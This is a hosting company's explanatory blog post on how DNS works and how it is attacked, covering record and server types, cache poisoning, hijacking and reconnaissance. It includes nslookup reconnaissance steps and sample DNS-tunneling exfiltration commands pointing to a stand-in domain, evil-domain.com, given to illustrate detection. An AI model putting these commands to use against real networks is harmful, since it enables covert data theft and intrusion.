BLOG

October 7, 2021

What is the DNS system of domain names?

Basic principles of how DNS works on the Internet and security

DNS System Explanation on Internet Banner

The Domain Name System (DNS) is a fundamental component of the modern network that translates between human-readable domain names and the underlying Internet Protocol (IP) addresses that connected devices use to communicate with each other. DNS predates the World Wide Web and facilitates virtually all communications on the Internet, as well as other uses that could not even be imagined when it was developed in the early 80s. However, the lack of security features in this long-lived network protocol has led to numerous vulnerabilities and attacks. In this article, we will answer questions like "What is DNS?", "How does DNS work?" and "What are the different types of DNS records?"

What is DNS?

DNS is often referred to as the Internet version of the Yellow Pages . In the old days, when you needed to find a business address, you looked for it in the Yellow Pages. DNS is just like that, except you don't actually have to search for anything - your internet-connected computer does it for you. This is how your computer knows how to find Google , ESPN.com or Managedserver.it.

For two computers to communicate over an IP network, the protocol dictates that they need an IP address. Think of an IP address as a street address: for one computer to "locate" another, they need to know the other computer's number. Since most people are better at remembering names - www.google.it - that the numbers - 142.250.185.163, needed a computer program to translate the names into IP addresses.

DNS is most often thought of in the context of the World Wide Web, but in truth there is a DNS lookup behind almost every type of network request, even those not initiated by a user. Software updates, social media apps, and even malware generally reach a host name rather than an IP address. This way, if the underlying IP address changes, connectivity can still be established.

How DNS works

DNS is such an integral part of the internet that it's important to understand how it works.

Think of DNS as an address book, but instead of mapping people's names to their addresses, the address book maps computer names to IP addresses. Each mapping is called a "DNS record". DNS clients on connected devices reach DNS servers to retrieve these records. Different types of records are used for different purposes. Web browsers rely on a type "A" record, while the "MX" record indicates the direction to a mail server. Here's how you can host a website with one service provider and an email service at another.

Here is a look at the "A" record for varonis.com as seen by a popular command line utility called DiG:

As you can see in the example, it is possible to have multiple records for a single host name or domain. This can be used to provide redundancy and load balancing.

The internet has a lot of computers, so there's no point in putting all these records into one big book. Instead, the DNS is organized into smaller books or domains. Domains can be very large, so they are further organized into smaller books, called "zones". No single DNS server stores all the books - that would be impractical.

Instead, DNS operates in a distributed fashion, with millions of servers around the world working together. When your computer wants to perform a DNS lookup, it may ask the DNS server on your local router. The local router will in turn make an “upstream” query to another DNS server, often provided by an Internet Service Provider. Queries for a domain can go “upstream” until they reach the authority of the domain or “authoritative name server”. In practice, the results are often "cached" at lower levels to avoid having to run the entire process for each query.

An authoritative name server is where administrators manage the server names and IP addresses for their domains. Whenever a DNS administrator wants to add, change, or delete a server name or IP address, they make a change to their authoritative DNS server (sometimes called the “primary DNS server”). There are also “slave” DNS servers; these DNS servers keep copies of the DNS records for their zones and domains.

DNS queries, servers and record types

The basic concepts behind DNS are relatively simple, but over the years the technical side of things has become increasingly complex. Here is a look at some of the internal mechanics of the system:

What are the types of DNS queries?

A DNS query is the message sent by a client to a DNS server or between two DNS servers. A DNS query can be one of the following:

  1. Recursive DNS query

In a recursive DNS query, a DNS client will reach a server, which in turn will make upstream requests for the domain in question until a result is found. The only rule set for a recursive query is that a result must be returned, if there is one. There can be one or dozens of recursions. The initial server or even the local DNS client might have a cached result already. A time-to-live (TTL) value determines how long one of these results can be cached; once the TTL is reached, the client or server will have to look up the results upstream.

  1. Iterative DNS query

Unlike recursive DNS queries, iterative DNS queries do not travel upstream. Instead, the DNS server the client is addressing will do its best to answer the query. If not, it might suggest a different DNS server such as authoritative name server or TLD name server. The requester will continue this iterative process until it finds an answer or expires.

What are the types of DNS servers?

As already stated, DNS is a distributed system, which means that servers around the world work together to maintain and deliver DNS records. Different types of servers have different roles within the overall system:

  1. Recursive DNS

Sometimes called a recursive resolver, a DNS recursor receives queries from DNS clients, responds if a hit is available in the cache, or reaches a name server higher in the chain. Appeals are often handled by ISPs, but it's easy to change a computer's DNS configuration to point to another source for performance, security, or privacy reasons.

  1. DNS Root Server

As the name suggests, root servers are the foundation from which the entire DNS infrastructure is built. Root servers act as authoritative name servers for top level domains (TLDs) such as “.com” and “.net”. There is a problem, however, because the root servers themselves are referred to by host names within those same TLDs. If a DNS client can't determine which name server to turn to for “.net”, how can it possibly resolve a fully qualified domain like “a.root-servers.net”? The answer is that DNS clients and lower level servers are "bootstrapped" with a list of thirteen IP addresses of the main server. These addresses don't tend to change often and only one of them needs to be reachable to fix the others.

  1. TLD name server

TLD name servers are second in importance only to root servers, as they know where to go to get answers on any domain within a given TLD. When looking for www.managedserver.it , a TLD server for ".com" will respond first, pointing the client at the name server with the records for "managedserver". part of the domain name.

  1. Authoritative Nameserver

The authoritative name server is the last stop for a DNS query. This server, or often server for redundancy reasons, is the highest authority for a given domain. However, not all DNS queries reach the authoritative name server, as there may be cached results closer to the initial request.

Organizations often use DNS internally as well. The operation is not much different, except that DNS lookups and records remain within the corporate network rather than the Internet. This is known as "private" or "local" DNS as opposed to the public DNS service.

What are the types of DNS records?

DNS records come in a wide variety of types, each used for different purposes. Here are some of the most common:

  1. Record "A" - Classic use of DNS, translates a domain into an IPv4 address.
  2. “AAAA” Record - Same functionality as an “A” record, but using an IPv6 address instead of IPv4.
  3. Record "MX" - Abbreviation for "Mail Exchange", identifies the e-mail server associated with the domain.
  4. “TXT” Record: Used for a wide variety of purposes, from proof of domain ownership to cryptographic email signing to fight spam.

Advantages and weaknesses of DNS

Benefits

There are many good reasons why we are still using DNS after all these years. Some of the advantages of the system include:

  • It is distributed and resilient

There weren't many domains in use during the early days of the internet, so it's conceivable that we could have ended up with a single central database with all domain-to-IP mappings. This, of course, would not have allowed the scalability needed to power the modern Internet. The distributed nature of DNS also means that the system is resilient; a power outage, a cut fiber cable, or a cyber attack on a DNS server will not interrupt the system as a whole.

  • It is versatile and extensible

DNS developers have always wanted the protocol to be extensible as technology progressed. Extensions to the original DNS standard brought new features and functionality while maintaining backward compatibility. Over the years, new record types, improved rules for DNS packet delivery, and improved security have been added.

  • It is an open and well documented standard

DNS was not born out of a particular provider's dominance or a desire to gain market share. The Internet Engineering Task Force (IETF) openly publishes the set of rules that make up the protocol, allowing any software developer to implement DNS in their products. There are many different DNS client and server implementations, but because they conform to a common standard, they can all work together.

Weaknesses and Vulnerabilities

The first iterations of the Domain Name System (DNS) date back to the early 80s, well before the emergence of modern cybersecurity threats. As a result, DNS and many other older protocols still in use today, such as ARP and IMCP, never included much in the way of security features. In the years since, a number of extensions and mitigations have been devised as new threats have emerged, but DNS is still often abused by attackers.

From a threat actor's point of view, there are several characteristics that make DNS attractive:

  • Every network uses it

DNS is ubiquitous. Almost every computer network in the world will see thousands or millions of DNS queries every single day. While not technically necessary for an IP network to work, blocking or throttling DNS simply isn't practical, so nearly every firewall on the planet is configured to allow outbound traffic on port 53. This means attackers don't just have a almost guaranteed way out of a compromised network, but there's also a lot of legitimate traffic they can merge with.

  • There is no authentication

Like many other early network protocols, DNS never included an authentication mechanism. This means that in the main DNS protocol it is not possible to be sure that a certain result is authentic. Attackers took advantage of this with a whole range of opportunities for spoofing and poisoning attacks that target everything from individual machines to vast swathes of the entire internet.

Lack of DNS authentication became headline news in 2008 when security researcher Dan Kaminsky discovered a huge vulnerability that could have allowed attackers to poison the cache of almost any DNS server in use at the time. . The result was that even with very little technical skill, an attacker could trick legitimate DNS servers into sending bogus IP information for important domains like a bank or government institution.

Faced with the threat of bogus DNS records wreaking havoc in the internet community, service providers and standardization bodies have teamed up to adopt something called Domain Name System Security Extensions (DNSSEC). DNSSEC uses public key cryptography to digitally sign DNS results, ensuring that the response to a query is truly authentic.

  • There is no encryption either

DNS queries and their responses are sent in the clear, which means anyone on the network can view them with a tool like Wireshark . This presents potential privacy concerns because it means your co-workers, your boss, or even your ISP can tell which domains you interacted with. This is also true for websites that take advantage of SSL / TLS encryption; the actual data transferred between the site and your computer may not be viewable, but that initial DNS query that gave you the site's IP address in the first place is.

Two concurrent approaches have been advanced to wrap DNS traffic with a layer of encryption as it passes through a network: DNS over HTTPS (DoH) and DNS over TLS. Which approach to use - and whether DNS should also be encrypted in the first place - is subject of heated debates .

Types of DNS attacks

DNS reconnaissance attacks

DNS is all about information, which from an attacker's perspective can be a valuable tool. DNS queries can be used to map a victim's network infrastructure by revealing live host on a network , discovering the hostnames of high-value targets such as mail servers and files, and providing clues to applications and services in use. You can perform your local DNS recon mission simply by following the instructions below:

If you have a Windows computer, run the following commands as they are; if you are a Linux user, there are corresponding commands you can search for.

  1. Open a command prompt (type Ctrl + esc, the letters “cmd”, then enter).
  2. Type ipconfig
  3. You'll see the DNS domain you're in (connection-specific DNS suffix), your IP address, and a bunch of other things. You will want to refer to this.
  4. Type nslookup [IP address] You will see the DNS server name that is responding and, if the name is known, the DNS record that lists the name and IP address.
  5. nslookup –type = soa [your domain] This command returns your authoritative DNS server, it wouldn't be useful if you were trying to infiltrate a network.
  6. nslookup –type = MX [your domain] That command returns all mail servers on your local domain, in case you want to hack mail servers and don't know where they are.

As we have already learned, most networks have a lot of DNS queries going on all the time. For many standard security products and network monitoring solutions, the queries used by an attacker to enumerate a network do not look much different than all other legitimate queries. 

DNS hijacking to redirect traffic

The lack of authentication in the original DNS protocol gives attackers a huge advantage because it means that queries and responses can be manipulated or spoofed in many different places from the local machine to the global DNS resolvers.

A classic local network attack involves chaining ARP spoofing with an unauthorized DNS server. If successful, this will cause other machines on the network to funnel their DNS queries to a server controlled by the attacker. The attacker can then return their IP addresses for those queries instead of the legitimate address. Without the mitigations in place, a user could type in a domain like example.com, see a page load, and never have any indication that he was actually communicating with a malicious fake.

Attackers can also use a variety of techniques for poison the cache of legitimate DNS servers . This typically occurs when organizations run their own local DNS recursor; a successful cache poisoning attack on a large public DNS provider could have a global impact, so these providers tend to be very security conscious. However, even the big providers they are not immune to vulnerabilities .

If an attacker successfully spoofs a DNS response, it can make the receiving DNS server's cache a poisoned record. So how does it help the attackers?

Here's an example: Let's say an attacker learns that your organization is using an external application for something important, like spending. If they poison your organization's DNS server so that it sends every user to the attacker's server, all they have to do is create a legitimate-looking login page and the users will enter their credentials. They could even forward traffic to the real server (acting like a "man in the middle"), so no one notices. The attacker can then try those credentials on other systems, sell them, or just celebrate with a wicked laugh.

Using DNS as a covert channel

Since outgoing DNS traffic is hardly ever blocked, and tends to be a lot, using DNS for data exfiltration or secret communications has become a favorite tactic of many sophisticated adversaries. The attackers' goal is to merge with all that legitimate network traffic through a called technique DNS tunneling . In some cases, an attacker will simply use the DNS protocol in ways not intended for data transfer. This can be risky, however, as it could generate large spikes or unusual traffic patterns that a well-prepared organization can quickly notice.

A more sophisticated approach involves misusing the DNS infrastructure itself. The attacker will set up a DNS domain (evil-domain.com, for example) on the Internet and create an authoritative name server. Then, on the compromised host, the attacker can use a program that splits the data into small chunks and inserts them into a series of searches, like so:

  • nslookup My1secret1.evil-domain.com
  • nslookup is1that1I1know.evil-domain.com
  • nslookup how2steal1data.evil-domain.com

The corp.com DNS server will receive these requests, realize that the results are not in its cache, and will relay those requests back to the authoritative name server of evil-domain.com. The attacker expects this traffic, then runs a program on the authoritative name server to extract the first part of the query (all before evil-domain.com) and reassemble it. Unless your organization is inspecting queries made by DNS servers, they may never realize that their DNS servers were used to exfiltrate data.

And even more types of attacks!

The above list is by no means a complete list of all possible DNS attacks. Protocol has been abused for everything from DDoS campaigns al covert monitoring of Internet users . Attackers have recently been observed modify the DNS configuration in different varieties of home routers to spread malware . Both malicious actors and security researchers are constantly on the lookout for new vulnerabilities, and their attention is unlikely to shift anytime soon.

DNS has been around for a long time, and every computer connected to the Internet relies on it. Attackers now use DNS for both external and internal reconnaissance, to hijack traffic and create secret communication channels. Fortunately, monitoring DNS servers e applying security analysis , many of these attacks can be detected and prevented.

Do you have doubts? Don't know where to start? Contact us!

We have all the answers to your questions to help you make the right choice.

Chat with us

Chat directly with our presales support.

0256569681

Contact us by phone during office hours 9:30 - 19:30

Contact us online

Open a request directly in the contact area.

INFORMATION

Managed Server Srl is a leading Italian player in providing advanced GNU/Linux system solutions oriented towards high performance. With a low-cost and predictable subscription model, we ensure that our customers have access to advanced technologies in hosting, dedicated servers and cloud services. In addition to this, we offer systems consultancy on Linux systems and specialized maintenance in DBMS, IT Security, Cloud and much more. We stand out for our expertise in hosting leading Open Source CMS such as WordPress, WooCommerce, Drupal, Prestashop, Joomla, OpenCart and Magento, supported by a high-level support and consultancy service suitable for Public Administration, SMEs and any size.

Red Hat, Inc. owns the rights to Red Hat®, RHEL®, RedHat Linux®, and CentOS®; AlmaLinux™ is a trademark of AlmaLinux OS Foundation; Rocky Linux® is a registered trademark of the Rocky Linux Foundation; SUSE® is a registered trademark of SUSE LLC; Canonical Ltd. owns the rights to Ubuntu®; Software in the Public Interest, Inc. holds the rights to Debian®; Linus Torvalds owns the rights to Linux®; FreeBSD® is a registered trademark of The FreeBSD Foundation; NetBSD® is a registered trademark of The NetBSD Foundation; OpenBSD® is a registered trademark of Theo de Raadt. Oracle Corporation owns the rights to Oracle®, MySQL®, and MyRocks®; Percona® is a registered trademark of Percona LLC; MariaDB® is a registered trademark of MariaDB Corporation Ab; REDIS® is a registered trademark of Redis Labs Ltd. F5 Networks, Inc. owns the rights to NGINX® and NGINX Plus®; Varnish® is a registered trademark of Varnish Software AB. Adobe Inc. holds the rights to Magento®; PrestaShop® is a registered trademark of PrestaShop SA; OpenCart® is a registered trademark of OpenCart Limited. Automattic Inc. owns the rights to WordPress®, WooCommerce®, and JetPack®; Open Source Matters, Inc. owns the rights to Joomla®; Dries Buytaert holds the rights to Drupal®. Amazon Web Services, Inc. holds the rights to AWS®; Google LLC holds the rights to Google Cloud™ and Chrome™; Facebook, Inc. owns the rights to Facebook®; Microsoft Corporation holds the rights to Microsoft®, Azure®, and Internet Explorer®; Mozilla Foundation owns the rights to Firefox®. Apache® is a registered trademark of The Apache Software Foundation; PHP® is a registered trademark of the PHP Group. CloudFlare® is a registered trademark of Cloudflare, Inc.; NETSCOUT® is a registered trademark of NETSCOUT Systems Inc.; ElasticSearch®, LogStash®, and Kibana® are registered trademarks of Elastic NV This site is not affiliated, sponsored, or otherwise associated with any of the entities mentioned above and does not represent any of these entities in any way. All rights to the brands and product names mentioned are the property of their respective copyright holders. Any other trademarks mentioned belong to their registrants. MANAGED SERVER® is a registered trademark at European level by MANAGED SERVER SRL Via Enzo Ferrari, 9 62012 Civitanova Marche (MC) Italy.

Back to top